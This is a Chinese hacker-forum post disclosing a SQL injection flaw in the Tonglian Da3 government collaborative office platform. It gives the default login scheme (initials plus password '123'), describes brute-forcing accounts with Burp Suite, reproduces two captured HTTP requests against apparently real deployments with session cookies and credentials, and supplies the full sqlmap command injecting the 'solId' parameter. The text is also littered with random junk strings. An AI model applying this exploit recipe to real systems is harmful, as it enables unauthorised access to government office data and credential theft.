找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1315|回复: 0
打印 上一主题 下一主题

同联Da3协同办公平台前台通用sql injection漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:15:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

1 y0 d$ L, @4 W2 G* }" l# l
$ X5 X3 O2 D2 O& a: K& k* w% Q

; d7 I9 A h+ v, ]# \

+ B r& v( L; g 平台简介: / q' R& {5 }, l

6 C$ P/ j/ U) {1 A

$ F, S1 G& d0 w0 i" Y   ' v0 N w2 u; c. m/ e3 W" P

/ D! ]; Z$ _% Y" [( K0 F

; u1 Q# t4 f- X* l% A; e7 | 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
+ @9 x8 o' m0 _+ u: U- b6 O同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
" ^, Q2 `) a3 D7 c7 P 同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!' x! l) f* B& n7 [( q8 N h5 Q

9 a) X0 s: V0 h! m) W% i7 o4 Y7 q

^$ `6 r n( @, A. G  ) @ q6 ^6 a \3 k& K- y8 O4 i |

/ |3 y* t8 h- i7 p J4 T+ S* u

" m1 Z& L6 d, C( M 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:9 U2 [# Q+ p% H! h6 t: ]

1 n2 q9 K8 l+ C2 q- f) _

' N% M; S6 K& T   2 I4 n6 ?* O/ u

( v8 t$ v3 ~- o5 p8 a |/ T7 h

$ T8 p2 E* m Y# h; U- Y4 J http://1.1.1.1:7197/cap-aco/#(案例2-) 8 t# `1 \- |- _" M: ~

/ \9 h# p9 Z7 D" S% ^

* Y7 r7 d+ a- n# W+ m! g9 l http://www.XXOO.com (案例1-官网网站) ; S$ h) a9 l' Z) e' [! h- T

5 Y* \2 V5 t# V4 e9 d s

$ t/ F2 e- r8 Z  % H; }% y5 y' K9 t

$ I( g/ d4 m1 Y, b$ z: N- o

6 }6 n5 |9 o% \6 G, E/ g 漏洞详情: $ z, \2 H9 J, v2 U* U

! F# b$ ?' |1 o: G$ I8 \

, Z, Z- v, [) y, z/ `5 g& ^  初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试 7 A( i4 z$ ^' ^4 b5 J

% @- e5 n5 j, A/ r2 G: D

! o3 x m8 B( J8 f- L9 a      首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图: - E }/ o& n+ m. e0 i3 F

9 y j! m X4 T" x- T

* h/ i4 `' a0 P# O   2 Z) m! J3 g- o8 k4 K. M( E+ A, U0 O

, @! b) D7 s: L0 ^. G. c. \

2 n. k# F9 z, ^; H' h$ O  0 c" `- r$ t7 `

5 h" O: x8 l/ z2 S8 J2 X

9 E d, X4 h# L status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下: 3 D |' s1 D: Z

7 e" M( |9 N3 H, u+ o

; q7 ]9 O/ k& b( j* h 1、案例1-官方网站- y* z. E+ |7 t+ J

% E6 D* a1 y# |6 R' N. s

_! {$ ]8 w" O GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1 1 s0 P2 X- x: Y0 U; c* F6 I/ I& c

# K1 ^5 w! X4 f1 O+ \( H

% T; n: a& q- t6 `0 O" ?: H; a# R Host: www.XXOO.com( n8 r0 D( J! N, f& E! [

" D1 u# y0 D3 A/ W% g

$ A1 z& }9 u8 T2 A! W! _ Proxy-Connection: Keep-Alive9 h9 S& n8 l3 U4 G1 C8 T( G8 q {

: q( J% k. J* t8 n

( A: [, M+ N& `. } ]0 m Accept: application/json, text/javascript, */*; q=0.010 }' m% j/ Q4 j3 n; v1 E

, _2 }! }; s( |9 f. W

+ ~, D2 q; _9 G0 N! O$ K9 w7 u, d# c Accept-Language: zh-CN 8 R- j. m' s: ?- M- I" V+ j

' h) V- F4 p- W! u3 q

0 x K, W( n" ?, d5 G Content-Type: application/json9 a. X( A/ J' ~6 U: H) R% b5 P

/ G N! d( S* v* ~$ ?' z- y" e9 [

- h q3 N8 U( D User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko ) Z- ?+ S, g1 [- C" j

5 F* ` T) v. ?) |

L1 b R6 D: |% r" e% U X-Requested-With: XMLHttpRequest% L& q. ]' w$ B5 f+ D9 K5 x R2 Z

?/ M z/ j* h" J7 J1 E% L* P$ Y

* _0 ?: D( ?$ D' `1 l3 u3 H Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002 4 D4 B$ i: F8 ] t/ b

& T, n6 k- a. Q4 U9 H

6 E1 y# Y) l7 e Accept-Encoding: gzip, deflate, sdch5 |/ M4 w# }1 R9 y) S, S

# c% F1 [+ i8 Y$ T# \

. `- ~- Z% U2 w! \; { Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e ) L9 t' Y! u( z+ }* V/ T5 R

" d. S1 Y0 q s! p- h5 D1 |

5 L: X8 N/ _% b S/ \! ` 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:8 i6 z6 M+ b( J/ n/ E3 P9 G

2 t' U1 `: \1 `6 C$ u' E6 b8 Z

% |& i3 P; `# g5 @4 `   ) Z p" k' T; S @4 J o& m7 {

! K0 _0 I( h1 r6 n$ c

- P# L* o9 S% E   1 x3 B+ k4 i5 H" g- m

6 t2 V3 K% q. b* S; a- H! w7 s0 f+ W

. g0 `/ z6 N3 q   " P0 @9 `9 H' r4 M; h

d) j- O* Y/ E, D5 C. g

! r4 Q5 h6 G* L( t2 m  0 _9 Y m2 v# w/ J0 c

+ r0 c7 t& o( Q. j2 q0 y% f/ O- K7 K2 d

1 M: z' b" H; b7 `, O* w+ Q   # ?; F3 ` f$ G7 T' g

8 D0 }: ~! s( z' D+ M& ?; g( \/ F6 s ~

$ t' f: ~ F* [* D$ |# O 2、案例2-某天河云平台4 G( M# z+ m7 L* A5 X, |

: C8 _& Q3 c- X2 p

9 z4 V. R* Z' X4 Q GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1 o% r) h* C. a7 r: F4 K

) z* E/ _' y# h0 o

( P6 I8 w4 z( N& C6 ]1 U Host: 1.1.1.:71976 s% Z1 x0 g/ \2 _3 G+ m; U

! `0 s/ |# ?& f* Q$ d* s+ b

, T1 A7 B3 ]) z4 S Accept: application/json, text/javascript, */*; q=0.01 3 [9 y6 Q- `3 u; L3 \6 o

3 D% l. n+ O5 ~' I) P# V6 U3 X

# U* S; a& V% `1 s) w X-Requested-With: XMLHttpRequest 9 b, j& H6 t8 h7 N+ g u

* ?# K' I/ ]9 B u+ Y

- B1 m# a# m. j' u# y# M+ L( d User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.04 L0 O) M0 T5 j* @7 p$ ]

) A, ~# z- |. Q* b* J+ Z- W

* b3 W5 Z6 B' ~* r& q) x7 I Content-Type: application/json$ Y9 ]! m- L: n5 H3 M. q

0 e. b: C6 o. u" h% W

& G8 K1 k; c0 w) | Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008 1 c- {5 d' }2 ?

$ H0 v$ X1 P% {& w+ l, p" D

9 g$ t/ s+ x: ?; N% E3 Z' t- B Accept-Language: zh-CN,zh;q=0.8 : W$ G* i( I; d8 X, B# I

0 Z' ~9 K6 |6 j! p1 w- [/ ^

& j: _4 Y) n! L: m2 W: j# x9 b Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1+ {+ A3 p8 ~. b7 V1 a9 u

$ F% j' F; ?3 a0 A2 C

# h0 q, R" T$ k; c9 r1 b Connection: close# Q, W/ ~# A+ T

8 Y0 {9 V$ H2 k x; a P2 ]$ w3 N# g' b

- R$ c6 e0 c) l5 }5 u" n 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:' S) h) M8 S+ _* o N" a8 L* I

5 _1 U6 ^& Q* U" Q- ]

4 E$ K T( J: J0 a9 d( A3 w9 v   / k B+ Z' _8 @7 J' a6 M

3 t5 g) U3 X8 m

, {0 o# ]: v/ u7 _
0 ^8 i2 J3 h9 K" A) M c

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表